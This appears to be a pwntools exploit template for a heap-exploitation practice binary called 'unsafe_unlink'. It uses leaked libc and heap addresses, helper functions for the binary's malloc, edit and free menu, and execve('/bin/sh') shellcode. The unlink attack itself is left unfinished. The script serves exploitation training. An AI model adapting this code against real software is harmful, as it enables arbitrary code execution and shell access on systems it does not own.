#!/usr/bin/python3 from pwn import * elf = context.binary = ELF("unsafe_unlink") libc = elf.libc gs = ''' continue ''' def start(): if args.GDB: return gdb.debug(elf.path, gdbscript=gs) else: return process(elf.path) # Index of allocated chunks. index = 0 # Select the "malloc" option; send size. # Returns chunk index. def malloc(size): global index io.send("1") io.sendafter("size: ", f"{size}") io.recvuntil("> ") index += 1 return index - 1 # Select the "edit" option; send index & data. def edit(index, data): io.send("2") io.sendafter("index: ", f"{index}") io.sendafter("data: ", data) io.recvuntil("> ") # Select the "free" option; send index. def free(index): io.send("3") io.sendafter("index: ", f"{index}") io.recvuntil("> ") io = start() # This binary leaks the address of puts(), use it to resolve the libc load address. io.recvuntil("puts() @ ") libc.address = int(io.recvline(), 16) - libc.sym.puts # This binary leaks the heap start address. io.recvuntil("heap @ ") heap = int(io.recvline(), 16) io.recvuntil("> ") io.timeout = 0.1 # ============================================================================= # =-=-=- EXAMPLE -=-=-= # Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written. shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh")) # Request a small chunk. small_chunk = malloc(0x88) # Edit the small chunk. edit(small_chunk, "X"*32) # Free the small chunk. free(small_chunk) # ============================================================================= io.interactive()